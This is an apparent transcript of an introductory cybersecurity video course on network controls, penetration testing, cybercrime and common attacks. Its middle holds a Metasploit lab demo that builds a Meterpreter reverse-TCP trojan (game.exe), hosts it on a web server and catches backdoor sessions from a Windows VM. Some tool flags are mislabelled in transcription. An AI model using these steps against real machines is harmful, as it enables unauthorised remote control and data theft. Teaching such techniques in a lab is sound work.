your data so that it is now no longer subject to man-in-the-middle or eavesdropping or modification attacks. So this is a layer of security that you're adding when you're connecting to the internet using an encrypted channel, which should prevent you from getting hacked or your data being compromised by hackers. So as you can see here, and if you remember the previous slides that we have seen, the hacker was able to copy the data very easily. Now that it is an encrypted channel, even if the hacker tries to eavesdrop and capture that data, it will be formatted in such a way that they would not be able to make sense out of it. Now the attacker or the hacker will have to try to decrypt the data. So that's another attack that they'll have to execute to find out the encryption key, decrypt the data, and then look at what the data was. Then we come across botnet. Now let's understand what bots are. Bots are nothing but the softwares that can be installed on vulnerable machines that would allow the hacker to send commands to the infected machines to generate some traffic or to do what the command tells them to do. So most of the botnets are used for distributed denial of service attack. If you remember the DOS and DDoS that we discussed a while back, this is where we tie it up with how they are executed. So a bot master or a hacker, let's call them a hacker, would try to identify vulnerable devices across the internet and try to install the bot onto those devices. The bot essentially is a software that would revert back to the bot master and advertise their availability whenever they have been powered on. A collection of such infected devices would essentially be called a botnet. When there are enough number of machines that the attacker feels are good enough to launch that attack on the targeted servers, the hacker will then initiate those devices, send the commands through the bot master to the bots, and the bots would then generate that kind of traffic, whatever they have been configured for, and then attack the targeted server. Now, this is also done to mask the identity of the hacker. Since the attack is being generated through the botnet, the IP addresses of the botnet computers would be reported to the targeted server, not the actual hacker's IP address. So to figure out who the attacker was would be very much difficult depending on the size of the botnet. So this, you can see, is the attack that has been created over the victims, and the malicious traffic has been generated through the botnet and the victims have been targeted through that. So as said, once that traffic has been done to forensically investigate at the victim's end, they would find the IP addresses of the botnet and not the attacker. Alright, let's start talking about network security controls. Network security controls are nothing but implementations of various devices to enhance the security of a particular network. These could be firewalls, intrusion detection systems or intrusion prevention systems, honeypots, unified threat management systems, and so on and so forth. The next gen firewalls that we talk about, right? So let's look at a review of what these devices are. Now, a firewall can be a hardware or a software that is responsible for allowing or disallowing a certain amount of traffic to or from your computer. So these are basically created to enhance the security posture of your network, where you can configure them for certain level of traffic to be allowed or some traffic to be disallowed. Now, a firewall is not going to decide by itself what is a good amount of traffic or what is bad traffic. You're going to configure the firewall by creating rules based on IP addresses, port numbers, protocols, and what may. And based on this, the firewall will then analyze the traffic coming in or going out to the inbound or the outbound rules. And if the traffic is allowed, it will allow the traffic to go through. If there's an explicit rule which says deny the traffic, it will drop the packets or it will delete the packets. It will not allow the packets to go past it. So if it is good traffic, that means it matches a rule that has been created that allows that traffic to go through, the firewall will allow it. If it's bad traffic, that means that there is a rule which denies that traffic to pass through. It will get blocked at the firewall level itself. The firewall will not allow it to enter the network. Similarly, an intrusion detection system. It is designed to detect unauthorized access to systems or intrusion attempts as well. Now, it works along with the firewall, and the main thing is that here there's a database against which it can compare the traffic. So most of the attacks that we have talked about, there are some distinct signatures that would cause concern or that would highlight that kind of an attack. Most of the organizations try to develop these kind of signatures, have them in a database and store them on the IDS so the IDS can analyze the incoming traffic, look at patterns from the traffic coming in or going out, compare it to the database of the signatures that it has, and if it matches any of the signatures, it will then detect that as an attack and send an alert to the administrator, where the administrator will then have to manually come in and check it out. An intrusion prevention system, as described earlier or as mentioned earlier, can be configured to react to that particular event. So if it detects something that can be classified as an intrusion, an administrator can pre-configure it to react to that particular packet in a particular manner. For example, drop the packets or reflect them to a honeypot or warn the administrator or do all of these things at the same time. So as you can see on the diagram on the internet, there's a hacker, they send some the data packets come in. The firewall is not able to analyze the traffic because a firewall cannot analyze the contents of a packet. It can only look at the header, it can only look at the IP addressing and the ports that have been created or the rules on which those things have been mentioned. And then it allows the data to go through. It reaches the IDS. The IDS then looks at two ways to scan. One is a signature that we've just spoken about, where the developer of the IDS creates those signatures and stores them onto the database, or another thing that is known as heuristic scanning, which is nothing but behavioral scanning. So it looks at the behavior of the data, and if the behavior looks malicious, it will then raise an alert and warn the administrator. Then let's come to honeypots. We just discussed in the previous slide that an IPS or an intrusion prevention system can be pre-configured that if it detects an anomaly or if it detects an intrusion, it may redirect the traffic to a honeypot. What is a honeypot? A honeypot is a decoy system. It is created to showcase a certain set of vulnerabilities to try to attract the attention of an attacker. Now, the word here is used as lure, but it's more to deceive the attacker. For example, if the attacker has been able to bypass your firewall and your IDS and now can scan the entire subnet, when they scan it, they would come across a device which is pretty vulnerable or showcases some vulnerabilities, which would definitely interest the hacker, because they would think that it is a vulnerable server which contains some valuable data. And that's exactly what honeypot is. It's a decoy server trying to act as a production server, trying to showcase that it has some valuable data, but also has some vulnerabilities in it so that the attacker can be attracted towards it and spend some time trying to attack it or analyze the honeypot. At the same time, the honeypot will analyze the data traffic and it will warn the administrator of a possible intrusion, which will give the administrator enough time to secure the rest of the network, and will also get to analyze the logs of the honeypot to try to understand what kind of attacks the attacker is trying to create and try to reverse engineer and identify the attacker at the same time. Let's talk about security testing. Security testing is nothing but a method which is carried out to identify threats and loopholes in a system. So here we are going to do a vulnerability analysis and penetration test. We may also go ahead and do a security audit. So what is vulnerability scanning, penetration testing, and security auditing? Vulnerability scanning is the activity which you're conducting to identify or look at possible weaknesses or issues or vulnerabilities or misconfigurations that exist in your infrastructure. So it is a proactive way where a team of security experts will launch a vulnerability scanner, scan certain devices that they have pre-identified, and once the report from the vulnerability scanner comes in, try to analyze the report and make sense out of it to see if there are any vulnerabilities that can be identified on those devices. This is obviously an ongoing process. Why? Because operating systems are patched, upgraded, new versions of softwares are released, and we keep on upgrading and we keep on changing our IT infrastructure ever so often. And hence, the IT infrastructure, like I say, is an ever evolving process. And to be abreast of all the latest vulnerabilities and threats, we need to do the vulnerability analysis in an ongoing manner to identify possible threats to the organization. So then what is penetration testing? Vulnerability analysis is just identifying the vulnerabilities, gaps, misconfigurations that may be in the organization's infrastructure. A penetration test is basically to validate whether those vulnerabilities that have been reported are real. If yes, how complex are they? What would be the impact? And what would be the technological impact? And what kind of data would be compromised? Or what would be the end result of that attack if it actually happens in the real world? So here, a bunch of ethical hackers would simulate an attack from a hacker's perspective or from an insider's perspective, a malicious outsider or a malicious insider, depending on how they perceive the vulnerability as. And then they will try to test the vulnerability to see how it can be exploited, to what extent it can be exploited, and what would be the compromise or what would be the data leakage that would happen if this vulnerability gets exploited. So there are three ways a penetration test can be conducted. There is a black box testing, a gray box testing, and a white box testing. If you look at black box testing, this is where the tester, or the penetration tester rather, has no knowledge about the organization, their infrastructure, applications, or anything. So this is where you're simulating a hacker who's sitting on the outside, who has no knowledge about the organization. So they start from the information gathering phase, where they're going to try to figure out the IP addresses, the IP ranges, devices, operating systems, applications, and anything and everything that the organization is going to use, and then try to figure out vulnerabilities within them, and then try to attack those vulnerabilities. This is a very time consuming and a cost consuming audit. The second one is a gray box testing audit, where a partial knowledge is given to the penetration tester. So this simulates a regular user kind of an attack. So let's say if I'm a regular user in an organization, and when I say regular user, I'm saying I'm not an administrator. So I have got limited access. And based on that limited access and the limited knowledge that I can gather about the infrastructure by being a regular employee, we are going to simulate a test with that knowledge to see whether an employee can take disadvantage of any vulnerabilities and then try to worm their way into the organization's infrastructure and hack it. The white box testing, on the other hand, is where we're looking at an insider, a malicious insider who already has all the accesses, who already has all the controls in his hand. So simulating an administrative access and then trying to figure out whether this administrator can escalate their privileges and gain some other administrator's access and try to then compromise data. For example, even if I'm saying I'm an administrator, I am not the only administrator in the organization. There would be backup administrators, there would be system administrators, there would be the Active Directory administrators, there would be application administrators, database administrators, and so on and so forth. So every single component that we have may have a different administrator. For example, switches would have a different administrator. Same thing with firewalls or any other security controls that you have. So if I am a administrator for backup, can I then try to worm my way out, escalate my privileges as a regular administrator or a system administrator, and then crack their passwords, try to get access and manipulate some data? So these are the three types of penetration testing audits that you will come across. There would be some different subtypes, but every organization can customize these kind of audits to whatever they require. Then we come to security auditing. Security auditing is nothing but an internal check that is carried out by internal auditors. That means people who are employees within the organization to find out flaws in the organization's information system. Now, this is more on the compliance side. This may take inputs from the vulnerability assessment and the penetration test, but overall we want to see what kind of policies that we have in our organization, whether those policies are working properly, whether they make sense, are there any gaps, and based on the technical inputs from the VAPT team, how do we map with the policies that we have defined for that organization? For example, a password policy. Now we have documented that a password policy should be effective enough that passwords cannot be easily brute forced. So that's a high level policy. Then we dictate a procedure for that policy to be implemented, where we say, hey, we want the systems to be configured where the password meets some complexity standards. For example, should be uppercase and lowercase a through z, 0 through 9, should use special characters, and should be randomized password, should not be dictionary based or based on the user's name. Now, this is the policy that we have created and the procedures that we have defined. Are they being actually implemented in the real world? So a vulnerability analysis would determine whether the passwords are probably weak or not. So if the vulnerability report comes back and says the passwords are probably weak, then a penetration tester would go in and then try various attacks to see if passwords can be compromised. And if yes, they would then look at the complexity of the passwords, compare it to the procedures and the policies. And if they do not match, that's where your security auditing comes into the picture. So you're basically tying up the policy, the procedures, and the actual implementation that you have created in an organization. Now, first and foremost, what is cybersecurity? There are three main pillars of cybersecurity that we deal with since the inception of computers, and they're known as the confidentiality, integrity, and availability triad, also known as CIA. Not to be confused with the American Intelligence Agency, but here we're looking at three different pillars where we want our data to remain confidential, the integrity of the data to be intact, and the data to be made available at all points in time. So let's talk about these three aspects. The principle of confidentiality asserts that the information and functions can be accessed only by authorized parties. So, for example, even if you password protect your file, what is it that you're trying to do? You're trying to prevent other users accessing your data and peeping into your files so that your data remains confidential. It is only shared with people who know the password. Integrity. This is where the trustworthiness of that data comes into the picture, where if the data is going to be changed, for example, you have a spreadsheet which has a lot of information about users and their login activities and whatnot, and you want to ensure that that data is not modified by any unauthorized user. So you're going to verify that the information is correct and is not modified by anybody who's unauthorized. The availability part ensures that this data is made available to all authorized users when and where they want it, right? The principles of availability assert that in systems, functions, and data must be available on demand according to agreed upon parameters based on levels of service. Now, this is where your service level agreements would come in. For example, when we log on to Gmail, we always assume that Gmail is going to work and is going to be available online. At no point in time, or very few times, has it ever occurred that you've gone onto the internet, typed in gmail.com, and the website is not available. In fact, if the website doesn't open, we figure out the internet is not working, right? But Gmail as a service is always made available. Now, when we talk about threats to CIA, the confidentiality, integrity, and availability, we talk about them in two different parameters, cybercrime and hacking. So, what is cybercrime? Cybercrime is any criminal activity or any unauthorized activity that would involve the usage of any computing device which would result as a security incident at the victim's end. Most cybercrimes are carried out in order to profit from them. Criminals would try to do phishing attacks to steal your money out of your bank accounts, or would try to con you into giving out your credentials, thus compromising your email accounts or your social media accounts, and try to gain access to your identity. Cybercrimes are generally carried out against computers or devices directly to damage or disable them, spread malware, steal secret information, etc. So this talks about the motivation part of cybercrimes. What would be the motivational aspect for a person to conduct such an activity, right? So basically to cause damage, like WannaCry happened in 2017. The perpetrators, those used WannaCry, probably gained a lot in the ransom that they demanded for that data to be decrypted, but it also cost the world a lot of money in profits that were lost. Let's move on to tackling cybercrime. So what do we mean by cybercrime? Now again, if you remember a few slides back or a few topics back, we talked about information security and we talked about cyber security, and we talked about the difference between both of them. Information security could be about anything, normally contained within the organization, the data that the organization has, and us securing those data by introducing the security controls that we talked about. Cybersecurity would be something that is on the internet or on the web. So any web application that I have deployed on the internet, any databases that I have, that would talk about cybersecurity. So if your Facebook account gets hacked or your OneDrive gets hacked, that's where cybersecurity comes into the picture. But if your physical computer gets hacked because your password got cracked by a physical attack, that's where your information security is. So some of the basic ways of preventing cyber attacks on us. Use unique and strong passwords. We've just discussed the complexity of the passwords. We want to keep them random. They should not be guessable. They should not be based on dictionary words, and they should be randomized in such a way that they cannot be predicted or guessed. The length of the password should be very good. Should at least the minimum, bare minimum should be 8 characters. Even that is not suggested in today's world. It has to be at least 12 to 16 characters. An operating system, I think, in today's world will support up to 24 or 26 characters. If you go into encryption softwares, they support up to 60 odd characters of passwords. So you want to keep those unique. You want to recycle those passwords on a regular basis. You do not want to reuse old passwords again and again. Avoid public Wi-Fi. That's a must. We always look for free Wi-Fi. We go to coffee shops because they advertise free Wi-Fi. That's nowadays a unique selling point for coffee shops and establishments. And we go there, we connect to the Wi-Fi because we get free internet and we get to serve whatever we want. The problem is we have no idea who else is connected to that Wi-Fi and what kind of attacks they are creating. We would discuss Wi-Fi attacks later on in one of the later videos where I can demonstrate how these attacks work. But for now, just remember that public Wi-Fis are very risky. And if your security is not up to the mark, you might just end up getting hacked like nobody's business. Ignore and delete mails from unknown senders. Phishing attacks, very common attacks in today's world. You get an email saying you've won a lottery or you've been chosen for something, or please click here to download your free software and something like that. And those emails are plenty nowadays. I received an email yesterday where there was a Nigerian prince who had died and he had left around $500 million behind. And there was this accountant who wanted to smuggle that money out. And it was a huge email giving me all the details. And out of 7 billion people on this planet, they identified my email address. And they wanted to share half the money with me so that they can masquerade the money and avoid paying taxes, inheritance taxes and whatnot. It was a ridiculous scheme. I mean, being chosen out of 7 billion, 1 out of 7 billion, our luck can't be that good, can it? So you have to be wary about these attacks. Always ask the question, if you won a lottery, did you purchase the ticket? No. So there's never a free lunch, right? So always keep on questioning the things that you've been getting. I'm not saying ignore them, because some of them may actually come true. There's always that 1% hope, but always investigate those things to see whether they are spam, if there is a fraud going on. And if yes, you yourself can communicate with the law enforcement agency and try to figure out who is responsible for that fraud. Make use of antivirus software and always keep it updated. Again, let's not go for the free antivirus softwares because they may be good at detecting infections, but when they come for disinfecting those files, then that's where they ask for money. And that's when you're going to run around and say, okay, let me see which is a very good antivirus to disinfect this kind of a infection. So there are a lot of antiviruses out there, I know that, and it's very confusing which is the best one today. Now, the problem is whichever is the best one in the market may not be the best one for the operating system that you're using. For example, there would be a good antivirus for Windows 7, but the same antivirus installed on Windows 8 or Windows 10 wouldn't be that effective. So always do an investigation. The best way to look at antiviruses and identifying which antivirus suits you is to investigate that antivirus and see the detection rate of that antivirus. See how often does it detect the infections that you're looking at. What you can do is you can head on to a website called virustotal.com. That's virustotal.com. It's a Google owned website. They have around 60 to 70 odd scanners on that website. Most of the known antivirus scanners are there. Try to see if you can get hold of an infected file. Be very careful. You don't want to get infected yourself or your computer. You can upload it to that particular website and analyze that file and see which antivirus detects those kind of viruses. A few files, a few infections over here and there, and you will come to know which antiviruses would work for you. Use multi-factor authentication or two-step processes for authentication. Just don't rely on a username and password. Register devices, get OTPs either on your email or on your devices. That gives you an added layer of security. If your password gets compromised, that's still okay, because now the hacker will need to simulate your phone as well. So that's added headaches, and it may just not be worth it. There are so many other people who don't use these kind of techniques who can be hacked much easily than people who have an added layer of security introduced. And be very careful when you're downloading apps. Now, when we say applications, on your mobile phones as well as in your computers. On your mobile phone, you still have a certain level of security where you can go to the Apple Marketplace or whatever it is called, the Google Marketplace or whatever it is called, and they do have some level of control. But when you talk about Windows operating systems and you're going on to the open internet to look for different kinds of softwares, you have no idea whether the website that you're on is trustworthy or is hosted by a hacker with a malware on that particular file that you're downloading, especially if you're downloading a pirated program. Never download a pirated program. So be very careful when you're downloading apps. When you're downloading an executable file, you can upload it to virustotal.exe, scan it to see if there are any viruses or malwares within it. The website also helps you analyze URLs to see if the URL itself may have any malicious attacks within them, embedded scripts or redirector scripts or things like that. So you can use that website to scan the apps that you're downloading and see if there is anything malicious about those apps. Moving on to cybercrime statistics. Now this is going to be interesting. Let's talk about how these things and the percentile of these things in today's world. By 2020, we would have generated 300 billion passwords. Now, the human population on this planet is 7 billion. Imagine 7 billion having 300 billion passwords. And I think half the population wouldn't have access to computers or the internet either. So imagine the number of passwords that we have. And that's what makes us use easy passwords, makes us repeat those passwords, and we use a single password for multiple accounts, right? Because there are just so many passwords that we have to remember. But that's the way it is. And if we want to keep ourselves secure, we are responsible for it. So please be very careful with those passwords. 24,000 malicious mobile apps blocked daily. In fact, the latest example that I can give you, I use an Android phone, and there's an application that I've always used called Cam Scanner. And recently, just 3 days back, my mobile phone started telling me that it is a malicious app, right? I've been using it for years now, probably 3 or 4 years, maybe more. What is the software? You can click pictures of a document, it will automatically convert it, it will beautify it, if that's a word, convert it into a PDF, and I can then send it as an attachment via email. A very handy app for me, or was an handy app for me. It worked beautifully, but 3 days back, suddenly the Android operating system and my antivirus on my Android phone started reporting it as a malicious software. So I went online and I checked into it, and it seemed that over a period of time, the developers changed their vision of that software, made it spyware, and then there was a dropper involved within that application which would then download a malware from a third-party server, install it, and start spying on you and start showing you malicious advertisements, right? So this was an existing app which was trusted over a period of years, and over a period of time, slowly, they modified it into a spyware. Kaspersky was an organization that detected it in the first place and then pointed it out to Google. Google took it off the Google Play Market, and now there is a variant of it available, but if you look at the reviews, all of them are 1 stars, where they have identified that this is a malware now and it spies on them and it actually compromised some people's data. So that's the latest example. In 2017 or 18, there were 700,000 apps during that year that were identified by Google as malicious apps and were deleted from Google Play. So even if they're published, there will be thousands of people who will download it till the time Google realizes that it is a malware and then deletes it. Till then, you've already been compromised, and there is no way to protect yourself now. So be very careful when you download these applications. In the healthcare sector, ransomware attacks will quadruple. Now, the healthcare sector is a very volatile sector. It contains a lot of private and sensitive information, health information about individuals that can be misused by a lot of organizations, advertisements, pharmaceutical organizations, life insurance people, and whatnot, right? So these become very lucrative targets for hackers, where if they can steal the database and sell it on the black market, they will earn a lot of money. Ransomwares would basically work the other way around. They encrypt the data at the hospital side, and then they will hold the hospital ransom to pay up. Now you know how hospitals earn nowadays, right? So that's a lot of money that we're looking at. Cybercrime would cost up to $6 trillion in 2021. $6 trillion just for cybercrime. We're not talking about the income from the IT industry. We're talking about how much money we will lose to cybercrime because of the various attacks that would be created. 90% of hackers use encryption. Not only encryption, most of the advanced hackers will try to hide their identity by spoofing their IP addresses, MAC addresses, locations. They will use encryption and cryptography to hide their malicious softwares, to fool the antiviruses, IDSs, IPSs. And it is a very difficult task to even identify a particular malware, analyze it, and then do a root cause analysis and try to figure out who the responsible hacker was. So it's a very intensive task of doing such things, and most of the hackers would go scot-free because it is very difficult to identify them. Now, let's move on to the demo. It's a very interesting demo. We are using Metasploit, which is a penetration testing tool, and we are going to use a demo of using Metasploit. We are going to try to compromise the security of a particular system. Well, let's discuss the demo before we start executing it. So what we have done here is that we have two virtual machines on VMware Workstation. One is the Kali Linux machine, and the other is a Windows 7 machine. What we are going to do is we are going to use a penetration testing tool called Metasploit, which is available freely on Kali Linux, and we are going to use a particular payload generator on Metasploit called MSF Venom. And using MSF Venom, we are going to create a backdoor, a executable file which will contain a Trojan or a backdoor, and we are going to try to infect that to the Windows machine and see what happens when the victim executes that particular file. Now we are going to keep it at the basic level. We're just going to create the Trojan and then we are going to execute it. In a later lecture or in a later video, we'll see how we can mask that Trojan into a legitimate looking application so that a victim can be fooled by the application that we're going to execute. So let's start with the demo. Alright, so this is the Kali Linux VM and the other machine is a Windows 7 virtual machine. So what we are going to do is, on the Kali Linux machine, we are going to just open up a command prompt, right? It's just a regular command prompt, your regular commands. And what we are going to do is we are going to use the MSF Venom payload generator from Metasploit to create a game.exe file. Now the Trojan will be contained within the game.exe. So the command goes as such: MSF Venom -p for platform. We want it, or rather payload at this point in time, we want the payload to be Windows Meterpreter reverse _ TCP L host, and the IP address for the local host. I'll explain the command once I've typed it. Let's just check what our IP address for this machine is, and we have 192.168.71.133, and that's what we are going to type in here: 192.168.71.133, L port 4444-F exe-a x86, and we want that output in root desktop, and we want it as game.exe. So let's go through the command. The MSF Venom is the initiator command. It invokes the payload generator in Metasploit. -p is the payload. We want Windows Meterpreter reverse TCP. So what is a reverse TCP? Here, the Meterpreter allows us for remote code execution, where we are going to create the payload. We are going to execute the payload at the victim's end, and the payload will then generate a connection back to us being the hacker's machine, and thus the local host, which is the IP address of this machine, which is the hacker's machine that we're using right now, which is 192.168.71.133. That's why we have typed in the local host. And L port is the local port on which port do we want to listen in, or we want the payload to connect to the local host. So what we are doing is, the Meterpreter allows us remote code execution. We create the game.exe, we execute it at the victim's end. It is pre-coded to connect to a local host. The IP address is coded over there to a particular port, which in this case is 4444. You can put in any port number you want. Just ensure that the port is going to be free and it is not a regularly used port. Otherwise, you're going to get problems over there. So at this point in time, we're going to keep it as 4444. -F stands for function. We want an executable file. -A stands for the architecture. Here the architecture is 886, which is x86, which is 32-bit, and we are going to export it, and we are going to host it, or we are going to create the file on root desktop, and we are logged in as root, as you can see at the prompt. So when I press enter, I should see a game.exe popping up right about here on my desktop, if the command is correct, which it should be, and that's game.exe. Wait for it to be compiled properly. So there you can see platform Windows for payload, no encoder, payload size 333 bytes, and final size of executable file is 73,802 bytes. So now we have created game.exe. Now we are not going to convert this into, or we are not going to merge this into a malware and things like that. We are going to keep it simple. So to keep it simple, what I'm going to do is, as a hacker, I'm going to host this on a server, which is going to be on this same machine, right? So when we say we want to host an Apache server, the server is hosted in a directory called /var/www. So let's go there. Present working directory. We can see that we are in root cd var www, and there we are cd html, and that is where our web servers would be. So what we are going to do is we are going to create a directory mkdir shared, right, to an ls, and you can see the shared folder right here. ls-al will give you the list and the attributes, and we can see these attributes. We want to change these attributes, so we are going to use a chmod recursive command, give the permissions as 755 to the folder shared. Since we are in the same directory, we do not need to give the path for shared. Let's just verify it, and you can see the permissions being changed. And now what we are going to do is we are going to change the ownership from root to www-data for the web hosting. So chown for change ownership, recursive www-data www-data to shared. Alright, let's check if that's been done properly, and you can see that earlier it was root, and now it is www-data, right? And so that's the directory that we have created. Let's go back. What we want to do is we want to copy game.exe into this folder. So cp root desktop game.exe var www html shared, and cd shared. Let's see, we have game.exe right there. There it is. And now what we want to do is service apache 2 start. So essentially what we have done is we have created a directory in the HTML folder to host this file, and we have copied it from our desktop into the shared folder. And I'm going to pause here for a minute. Alright, so we have started the service for the Apache 2 server. That means we have started the web server. We have hosted the game.exe on the web server in the shared folder. We have changed the permissions and the ownership for the shared folder. Now we are going to go on to the Windows 7 machine, and we are going to open up the browser and see if the web server is now accessible. So if you remember, the IP address of that machine was 192.168.71.133, and we were in the shared folder. 192.168.71.133 shared, and if this is done properly, we should see the game.exe right here. And once we click on it, it's going to ask us whether we want to save the file. 72.1 KB, we're going to save it, and I'm going to save it on I think it just saved it here. And now before we execute it, we are going to go back into Kali Linux, and we are now going to start the listener. Right, so we have created the exploit, we have created the payload rather, we have hosted it onto a web server, which means that when somebody double clicks on it, the machine is going to try to create a reverse connection to our hacker's machine. But our hacker's machine needs to be configured to handle that incoming connection. So we are going to start off with MSF console. Now MSF console is the command which starts up Metasploit. Right, so we're just going to take a minute over here. You can see it's Metasploit framework console. It's going to start. It's does take a little bit of a while, and we're just going to wait it out. Let me turn this into full screen. Now you can see at the bottom left, we are on MSF on the MSF prompt. We are using Metasploit with 1,699 exploits. Now this is not the completely updated version. The latest one would have around 1,800 exploits, but the one that we want is exists in this version, so we are good to go. So we start off with the configuration of Metasploit to listen in onto that particular connection. So we say use exploit multi-handler. And when we say multi is basically something that affects multiple operating systems. and we're going to use that exploit. And you can see it's now opening up the handler which we need to configure, and here we're going to set the payload that it is going to expect, the payload being Windows meter reverse underscore TCP. You can see that the payload has been configured. We are going to say show options, and you'll see it is going to ask us options for the payload, which means the local host, the listen address, and the listen port. Now you can see we had by default given 4444, which is the default port for this exploit within Metasploit. If you want to change, if you have changed the port when you created game.exe, you need to change the port over here as well. And the commands here, let's say set lhost equals 192.168.71.133, enter, and I think I did a typo, so there's no equal to, that's it. And you can see now it shows the equal to mark, and we have now set the local host. If we want to set the L port, that's how we do it. We had 4444, and there it is. So if you have changed the port in the game.exe, ensure that you change the port here as well. Show options, and you'll see now the data is populated over here. Lhost, which is the local host, is 192.168.71.133, and L port, the local port, is 4444. We have configured this, and now what we're going to do is we're just going to type in exploit, and now you can see that it has started the reverse TCP handler on 192.168.71.133 on port 4444. So now when the victim, which is Windows 7, executes the file and we say run, at the victim's end, there's nothing that should happen. It's just resolving something, and at the other end, you can see that a meter session has been opened, and it shows us that from the victim's IP, which is 71.129 on port 49493, we are connected to our machine. So that's the connection that has happened. Press enter, and you can see it exits the session. Let's just look at the IP address on Windows to confirm that was the same machine that we had, and that's 129. Right there it is. Let's open up this file again and see what happens, and you can see the second session being opened up right here to a PWD, and you can see that we were connected to that particular website, right? So that's what this Trojans are supposed to do, give us a backdoor entry, and we then are able to connect, and we are able to copy data, and we are able to, basically we have a backdoor so we can do anything and everything that we want to do.
Just like how the COVID-19 situation is affecting various domains, it is also adversely affecting cybersecurity. Interpol states that attackers are attacking computer networks and systems of businesses, individuals, and big global organizations. Due to the shift of focus to the COVID crisis, cybersecurity is taking a huge brunt. Even WHO has stated that from the beginning of this pandemic, it has witnessed a sky-high increase in the number of cyber attacks. There are fake emails doing the rounds in which scammers are impersonating WHO. Reports also state that the financial services sector is increasingly being targeted during the COVID-19 coronavirus pandemic. Various banks and financial institutions have witnessed a spike in the number of cyber attacks in the last few months. Several banks are increasing cyber attack awareness amongst their customers and also asking them not to disclose any confidential information to a third party. Now that we have an idea as to how cyber attacks can affect us, let's go ahead and understand the meaning of a cyber threat. A cyber threat is a warning which allows you to prepare against a cyber attack. When there is an unauthorized access by a third party to your system and network, it is termed as a cyber attack. The person who carries this out is termed as a hacker or an attacker or a cyber criminal. A possibility of such an attack is termed as a cyber threat. As we saw previously, cyber attacks lead to data breaches which result in either data manipulation or loss of highly confidential data. It also results in financial losses, and which in turn has a colossal impact on the businesses. In addition to these losses, a lot of companies face reputational damages as well. Trust plays a vital role when it comes to customer relationships. Cyber attacks can hamper an organization's reputation and erode the customer's trust. Let's now get an understanding of the most common cyber attacks. Here, we will look into the top 10 cyber threats in today's times. First up, we have the malware attack. This is a very common form of cyber attack. The term malware refers to malicious software, virus, including spyware, worms, ransomware, adware, and trojans. Trojan virus is a form of malware that disguises itself as a legitimate software. Ransomware blocks access to the key components of the network, whereas spyware, as the name suggests, is a software that steals your confidential data without your knowledge. Coming to adware, it is also a software, but this software displays advertising content such as banners or pop-ups on a user screen. Malware breaches a network through a vulnerability. It usually happens when the victim clicks a dangerous link or downloads an email attachment, or also when an infected pen drive is used. Let's now have a look at the ways in which we can prevent a malware attack. First and foremost, you should use any kind of an antivirus software. This step might be something that you have heard time and again, but it is a very effective way to prevent a malware attack. Antivirus software is a program that can protect your computer against the above-mentioned viruses. This data security utility installed in a computer can prevent a malware attack. Few of the popular antivirus software are Avast Antivirus, Norton Antivirus, and McAfee Antivirus. Secondly, you should use firewalls. A firewall helps prevent an unauthorized access, viruses, and other malicious activities that occur over the internet. As the name suggests, it acts as a wall between your system and the internet. It filters the traffic that is allowed to enter your device. Windows and Mac OS X have their default built-in firewalls named as Windows Firewall and Mac Firewall respectively. Apart from this, in order to prevent attacks on your network, your router should also have a firewall built in. Thirdly, you should always stay alert and avoid clicking on suspicious links. The links might look to be legitimate, but they can be home to malware which is going to enter your system and cause a havoc. Lastly, it is wise to update operating systems and browsers regularly. If this is not done, cybercriminals can exploit these vulnerabilities and attack your system. That was all about preventing a malware attack. Let's move on to the next attack. It is the phishing attack. It is one of the biggest widespread types of cyber attacks. As per reports, phishing accounts for over $12 billion in business losses. So what is a phishing attack? It is an attack wherein an attacker impersonates to be a trusted contact and sends the victim fake emails. Unaware of this, the victim opens the email and clicks on the malicious link or opens the attachment in the mail. The aim of such an attack is to gain access to confidential information and account credentials. Hackers can also install malware through a phishing attack. This attack is growing bigger each day as attackers are becoming more convincing in pretending to be a trusted source. For example, you might get an email from Apple stating that your Apple account is kept on hold for security reasons, and the mail will ask you to type in your login credentials in order to restore your account. Do not fall for that, as it is a phishing email. Legitimate sources will not randomly send you mails and ask for your account credentials. Phishing is a type of social engineering attack. Social engineering attacks refer to several malicious activities that are obtained through human interactions. It manipulates the victim in such a way that he or she ends up divulging personal information. Such an attack can happen on any platform such as text messages or even on social media sites. Similar to phishing, you also have voice phishing known as wishing. Wishing will be carried out over a voice email or mobile phone or even over landlines. So how do we prevent a phishing attack? Human error is the reason for a high percentage of cyber attacks. To prevent a phishing attack, the wisest way will be to scrutinize the emails you receive. A phishing email will have some spelling mistakes or a format change from that of the legitimate source it is pretending to come from. Look for these loopholes and do not click any such suspicious emails. Next, you can also make use of an anti-phishing toolbar. Sometimes when it is impossible to identify a phishing email, this toolbar is helpful. It is a tool that provides you with anti-phishing solutions and information about the website you are browsing. They prevent fraudulent websites from masquerading as other legitimate websites. For example, Avast Online Security is a good anti-phishing toolbar you can get. You should also make it a habit to update your passwords regularly. This way, even if your old password is known to a third party, it will still be invalid. Let's now move on to the next type of cyber attack, that is the password attack. This is a form of attack most of us might have experienced at some point in time. Imagine when you try to log into an account and it says incorrect password. In such a scenario, it is possible that an outsider has managed to either guess or steal your password. By doing so, all your data is compromised. A hacker can crack your password with the help of various programs and password cracking tools like AirCrack, Kane-Enable, John the Ripper, Hashcat, and so on. There are different types of password attacks. A brute force attack happens when the hacker tries to log in with all possible password combinations. Meanwhile, in the dictionary attack, a list of common passwords is used to crack the user's login credentials. Next is a keylogger attack. Keystroke logging records the keys struck on a keyboard by the victim, and the victim is totally ignorant of this. This keylogger or a keystroke recorder can either be a hardware or a software. Speaking of how one can prevent password attacks, it is crucial that you use alphanumeric passwords which are strong. Incorporate special characters in your passwords as well. It is to be noted that you shouldn't be using the same password for multiple websites or accounts. Also, make sure to not use easily guessable passwords, which includes your name or your family members' names or even your date of birth. Needless to say, update your passwords regularly. This will limit your exposure to a password attack. The next tip is something we should all be careful about. Often we make complicated passwords, and to remember them, we note it down somewhere or keep some sort of a password hint in the open. This shouldn't be done in the open, as this can prove to be a gateway to an attack, as a third party can misuse your account with the help of your password hint. Let's now move on and have a look at the fourth type of cyber attack on our list, that is the man-in-the-middle attack. As you can see on your screens, we have the client on the left, the server on the right, and the hacker below. And now you can see that the client-server communication has been cut off, and instead the communication line now goes through the hacker. So let's elaborate on this. Man-in-the-middle attack is also known as eavesdropping attack. It takes place when an attacker comes in between a two-party communication. In other words, the attacker hijacks the session between a client and host. So what do they gain by interrupting the session? Well, they are able to steal and also filter data. Imagine you are logging into your bank account. In such a state, a man-in-the-middle attack can be used to obtain information related to your bank account. Let's now have a look at how we can prevent man-in-the-middle attack. Firstly, you should be aware of the security of the website you are using, and it is advised to use encryption on all devices that contain crucial data. Using an unsecure public Wi-Fi can help attackers carry out the man-in-the-middle attack. Hence, it is suggested 